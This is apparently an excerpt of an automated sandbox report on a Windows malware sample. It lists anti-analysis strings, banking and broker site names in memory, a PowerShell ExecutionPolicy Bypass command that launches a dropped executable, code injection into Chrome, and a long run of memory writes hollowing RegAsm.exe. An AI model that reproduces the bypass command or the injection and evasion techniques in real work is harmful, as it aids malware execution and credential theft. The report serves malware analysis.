                  Source: chrome.exe, 00000025.00000003.2196541667.000001FD6ABAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848P
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: VirtualMachine:
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: curcuma.exe, 00000024.00000003.2306939586.000002428F053000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: vmware
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: RegAsm.exe, 0000001E.00000002.2522471882.00000000019A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: curcuma.exe, 00000024.00000002.2517104645.000002428D55C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: curcuma.exe, 00000024.00000003.2251817425.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003DF4FF BlockInput,27_2_003DF4FF
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_0036338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,27_2_0036338B
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_00385058 mov eax, dword ptr fs:[00000030h] 27_2_00385058
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003C20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,27_2_003C20AA
                  Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_00392992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00392992
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_00380BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_00380BAF
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_00380D45 SetUnhandledExceptionFilter,27_2_00380D45
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_00380F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00380F91
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe Code function: 36_2_00007FF7C70911B5 Sleep,exit,SetUnhandledExceptionFilter,exit,36_2_00007FF7C70911B5
                  Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8140, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1FD691D0000 protect: page execute and read and write
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
                  Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Thread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: 691D0000
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Memory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1300000 value starts with: 4D5A
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13048A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130490CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304970Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13049D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304A38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304A9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304B00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304B64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304BC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304C2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304C90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304CF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304D58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304DBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304E20Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304E84Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304EE8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304F4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1304FB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305014Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305078Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13050DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305140Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13051A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305208Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130526CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13052D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305334Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305398Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13053FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305460Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13054C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305528Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130558CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13055F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305654Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13056B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130571CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305780Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13057E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305848Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13058ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305910Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305974Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13059D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305A3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305AA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305B04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305B68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305BCCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305C30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305C94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305CF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305D5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305DC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305E24Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305E88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305EECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305F50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305FB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306018Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130607CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13060E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306144Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13061A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130620CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306270Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13062D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306338Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130639CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306400Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306464Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13064C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130652CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306590Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13065F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306658Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13066BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306720Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306784Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13067E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130684CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13068B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306914Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306978Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13069DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306A40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306AA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306B08Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306B6CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306BD0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306C34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306C98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306CFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306D60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306DC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306E28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306E8CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306EF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306F54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306FB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130701CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307080Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13070E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307148Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13071ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307210Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307274Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13072D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130733CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13073A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307404Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307468Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13074CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307530Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307594Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13075F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130765CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13076C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307724Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307788Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13077ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307850Jump to behavior
